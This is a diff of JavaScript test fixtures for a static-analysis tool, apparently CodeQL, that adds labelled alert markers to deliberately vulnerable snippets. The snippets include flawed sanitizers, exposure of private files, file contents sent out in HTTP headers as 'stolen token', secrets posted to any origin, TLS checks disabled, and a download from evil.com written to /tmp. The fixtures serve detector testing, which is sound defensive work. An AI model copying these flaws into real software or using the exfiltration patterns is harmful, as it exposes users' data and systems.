if (str === "\"")
|
||||
return """;
|
||||
}) + '\'';
|
||||
}) + '\''; // $ Alert[js/incomplete-html-attribute-sanitization]
|
||||
|
||||
'="' + s().replace(/[&<>"]/gm, function (str) {
|
||||
if (str === "&")
|
||||
@@ -330,27 +330,27 @@ function incompleteComplexSanitizers() {
|
||||
}
|
||||
|
||||
function typicalBadHtmlSanitizers(s) {
|
||||
s().replace(new RegExp("[<>]", "g"),''); // $ Alert
|
||||
s().replace(new RegExp("[<>]", "g"),'');
|
||||
}
|
||||
|
||||
function typicalBadHtmlSanitizers(s) {
|
||||
s().replace(new RegExp("[<>]", unknown()),''); // $ Alert
|
||||
s().replace(new RegExp("[<>]", unknown()),'');
|
||||
}
|
||||
|
||||
function bad18NewRegExp(p) {
|
||||
return p.replace(new RegExp("\\.\\./"), ""); // $ Alert
|
||||
return p.replace(new RegExp("\\.\\./"), "");
|
||||
}
|
||||
|
||||
function bad4NewRegExpG(s) {
|
||||
return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert
|
||||
return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad4NewRegExp(s) {
|
||||
return s.replace(new RegExp("\'"), "\\$&"); // $ Alert
|
||||
return s.replace(new RegExp("\'"), "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad4NewRegExpUnknown(s) {
|
||||
return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert
|
||||
return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function newlinesNewReGexp(s) {
|
||||
@@ -359,8 +359,8 @@ function newlinesNewReGexp(s) {
|
||||
x.replace(new RegExp("\n", "g"), "").replace(x, y);
|
||||
x.replace(x, y).replace(new RegExp("\n", "g"), "");
|
||||
|
||||
x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert
|
||||
x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert
|
||||
x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert[js/incomplete-sanitization]
|
||||
x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert[js/incomplete-sanitization]
|
||||
|
||||
x.replace(new RegExp("\n", unknownFlags()), "").replace(x, y);
|
||||
x.replace(x, y).replace(new RegExp("\n", unknownFlags()), "");
|
||||
|
||||
@@ -88,7 +88,7 @@ app.get('/baz3/a', (req, resp) => {
|
||||
resp.send({ test: 123 });
|
||||
});
|
||||
|
||||
app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2);
|
||||
app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); // $ Alert
|
||||
|
||||
app.get('/currentGame', function (req, res) {
|
||||
res.send("FOO");
|
||||
|
||||
@@ -7,4 +7,4 @@ https.get({
|
||||
path: "/upload",
|
||||
method: "GET",
|
||||
headers: { Referer: content }
|
||||
}, () => { });
|
||||
}, () => { }); // $ Alert[js/file-access-to-http]
|
||||
|
||||
@@ -4,8 +4,8 @@ var path = require("path");
|
||||
|
||||
var app = express();
|
||||
|
||||
app.use('basedir', express.static(__dirname)); // $ Alert
|
||||
app.use('basedir', express.static(__dirname)); // $ Alert[js/exposure-of-private-files]
|
||||
const rootDir = __dirname;
|
||||
app.use('basedir', express.static(rootDir)); // $ Alert
|
||||
app.use('basedir', express.static(rootDir)); // $ Alert[js/exposure-of-private-files]
|
||||
|
||||
app.use('/monthly', express.static(__dirname + '/')); // $ Alert
|
||||
app.use('/monthly', express.static(__dirname + '/')); // $ Alert[js/exposure-of-private-files]
|
||||
@@ -5,21 +5,21 @@ var path = require("path");
|
||||
var app = express();
|
||||
|
||||
// Not good.
|
||||
app.use(express.static('./node_modules/angular'));
|
||||
app.use('/angular', express.static('node_modules/angular'));
|
||||
app.use('/animate', express.static('node_modules/angular-animate'));
|
||||
app.use('/js', express.static(__dirname + '/node_modules/angular'));
|
||||
app.use('/router', express.static(__dirname + '/node_modules/angular-route/'));
|
||||
app.use(express.static('/node_modules/angular'));
|
||||
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));
|
||||
app.use('/js',express.static('./'));
|
||||
app.use('/angular', express.static("./node_modules" + '/angular/'));
|
||||
app.use('/angular', express.static(path.join("./node_modules" + '/angular/')));
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules")));
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/'));
|
||||
app.use(express.static('./node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static('node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/animate', express.static('node_modules/angular-animate')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/js', express.static(__dirname + '/node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use(express.static('/node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/js',express.static('./')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static("./node_modules" + '/angular/')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files]
|
||||
const rootDir = __dirname;
|
||||
const nodeDir = path.join(rootDir + "/node_modules");
|
||||
app.use('/angular', express.static(nodeDir + '/angular/'));
|
||||
app.use('/angular', express.static(nodeDir + '/angular/')); // $ Alert[js/exposure-of-private-files]
|
||||
|
||||
|
||||
|
||||
@@ -37,10 +37,10 @@ app.use('basedir', express.static(__dirname)); // OK - because there is no packa
|
||||
app.use('/monthly', express.static(__dirname + '/')); // OK - because there is no package.json in the same folder.
|
||||
|
||||
const connect = require("connect");
|
||||
app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert
|
||||
app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert
|
||||
app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert
|
||||
app.use('/root', require('serve-static')("/")); // $ Alert
|
||||
app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/root', require('serve-static')("/")); // $ Alert[js/exposure-of-private-files]
|
||||
|
||||
// Bad documentation example
|
||||
function bad() {
|
||||
@@ -48,7 +48,7 @@ function bad() {
|
||||
|
||||
var app = express();
|
||||
|
||||
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert
|
||||
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files]
|
||||
}
|
||||
|
||||
// Good documentation example
|
||||
@@ -67,7 +67,7 @@ const serveHandler = require("serve-handler");
|
||||
const http = require("http");
|
||||
|
||||
http.createServer((request, response) => {
|
||||
serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert
|
||||
serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert[js/exposure-of-private-files]
|
||||
|
||||
serveHandler(request, response);
|
||||
}).listen(8080);
|
||||
@@ -22,7 +22,7 @@ try {
|
||||
res.setEncoding('utf8');
|
||||
});
|
||||
|
||||
post_req.write(s); // $ Alert - post the data from file to request body
|
||||
post_req.write(s); // $ Alert[js/file-access-to-http] - post the data from file to request body
|
||||
post_req.end();
|
||||
} catch (e) {
|
||||
}
|
||||
|
||||
@@ -26,7 +26,7 @@ fs.exists(fileName, function (exists) {
|
||||
res.setEncoding('utf8');
|
||||
});
|
||||
|
||||
req.write(chunk); // $ Alert - write data from file to request body
|
||||
req.write(chunk); // $ Alert[js/file-access-to-http] - write data from file to request body
|
||||
|
||||
req.end();
|
||||
});
|
||||
|
||||
@@ -19,8 +19,8 @@ function PostXML(xmlData)
|
||||
headers: {
|
||||
"content-type": "application/xml",
|
||||
},
|
||||
body: xmlData // $ Alert - passing data from file to the request body
|
||||
}, function (error, response, body){
|
||||
body: xmlData // passing data from file to the request body
|
||||
}, function (error, response, body){ // $ Alert[js/file-access-to-http]
|
||||
console.log(response);
|
||||
});
|
||||
}
|
||||
|
||||
@@ -15,14 +15,14 @@ try {
|
||||
hostname: "sstatic1.histats.com",
|
||||
path: "/0.gif?4103075&101",
|
||||
method: "GET",
|
||||
headers: { Referer: "http://1.a/" + content } // $ Alert - passing stolen token in a header
|
||||
}, () => { })
|
||||
headers: { Referer: "http://1.a/" + content } // passing stolen token in a header
|
||||
}, () => { }) // $ Alert[js/file-access-to-http]
|
||||
https1.get({
|
||||
hostname: "c.statcounter.com",
|
||||
path: "/11760461/0/7b5b9d71/1/",
|
||||
method: "GET",
|
||||
headers: { Referer: "http://2.b/" + content } // $ Alert - passing stolen token in a header
|
||||
}, () => { })
|
||||
headers: { Referer: "http://2.b/" + content } // passing stolen token in a header
|
||||
}, () => { }) // $ Alert[js/file-access-to-http]
|
||||
});
|
||||
});
|
||||
}
|
||||
|
||||
@@ -3,4 +3,4 @@ var http = require('http')
|
||||
var app = express()
|
||||
var server = http.createServer(app)
|
||||
// Static files:
|
||||
app.use(express.static(__dirname))
|
||||
app.use(express.static(__dirname)) // $ Alert[js/exposure-of-private-files]
|
||||
|
||||
@@ -1 +1 @@
|
||||
window.parent.postMessage(userName, '*');
|
||||
window.parent.postMessage(userName, '*'); // $ Alert
|
||||
|
||||
@@ -10,4 +10,4 @@ window.parent.postMessage(password, '*'); // $ Alert
|
||||
window.parent.postMessage(data.bar, '*');
|
||||
})();
|
||||
|
||||
window.parent.postMessage(authKey, '*');
|
||||
window.parent.postMessage(authKey, '*'); // $ Alert
|
||||
|
||||
@@ -5,7 +5,7 @@ let requestOptions = {
|
||||
"content-type": "application/json",
|
||||
"accept": "application/json"
|
||||
},
|
||||
rejectUnauthorized: false,
|
||||
rejectUnauthorized: false, // $ Alert
|
||||
requestCert: true,
|
||||
agent: false
|
||||
}
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
const webpack = require("webpack");
|
||||
|
||||
|
||||
var plugin = new webpack.DefinePlugin({ // $ Alert
|
||||
var plugin = new webpack.DefinePlugin({
|
||||
"process.env": JSON.stringify(process.env)
|
||||
});
|
||||
}); // $ Alert[js/build-artifact-leak]
|
||||
|
||||
|
||||
new webpack.DefinePlugin({ 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG }) })
|
||||
|
||||
@@ -12,5 +12,5 @@ var actions = {
|
||||
|
||||
app.get('/perform/:action/:payload', function(req, res) {
|
||||
let action = actions[req.params.action];
|
||||
res.end(action(req.params.payload));
|
||||
res.end(action(req.params.payload)); // $ Alert
|
||||
});
|
||||
|
||||
@@ -5,7 +5,7 @@ app.get('/:path', function(req, res) {
|
||||
let path = req.params.path;
|
||||
if (isValidPath(path))
|
||||
res.sendFile(path);
|
||||
});
|
||||
}); // $ Alert
|
||||
|
||||
function f1(req, res) {
|
||||
let path = req.params.path;
|
||||
@@ -22,4 +22,4 @@ function f3(req, res) {
|
||||
res.sendFile(path);
|
||||
}
|
||||
|
||||
app.get('/:path', f1, f2, f3);
|
||||
app.get('/:path', f1, f2, f3); // $ Alert
|
||||
|
||||
@@ -3,6 +3,6 @@ var fs = require("fs");
|
||||
|
||||
https.get('https://evil.com/script', res => {
|
||||
res.on("data", d => {
|
||||
fs.writeFileSync("/tmp/script", d)
|
||||
fs.writeFileSync("/tmp/script", d) // $ Alert
|
||||
});
|
||||
});
|
||||
|
||||
@@ -335,7 +335,7 @@ function mergeSelective(dst, src) {
|
||||
if (dst[key]) {
|
||||
mergeSelective(dst[key], src[key]);
|
||||
} else {
|
||||
dst[key] = src[key];
|
||||
dst[key] = src[key]; // $ Alert
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -8,13 +8,13 @@ app.get('/hello', function(req, res) {
|
||||
_.merge({}, req.query); // $ MISSING: Alert
|
||||
|
||||
_.merge({}, {
|
||||
value: req.query.value // $ Alert
|
||||
});
|
||||
value: req.query.value
|
||||
}); // $ Alert
|
||||
|
||||
let opts = {
|
||||
thing: req.query.value // wrapped and unwrapped value
|
||||
};
|
||||
_.merge({}, {
|
||||
value: opts.thing // $ Alert
|
||||
});
|
||||
value: opts.thing
|
||||
}); // $ Alert
|
||||
});
|
||||
|
||||
Reference in New Issue
Block a user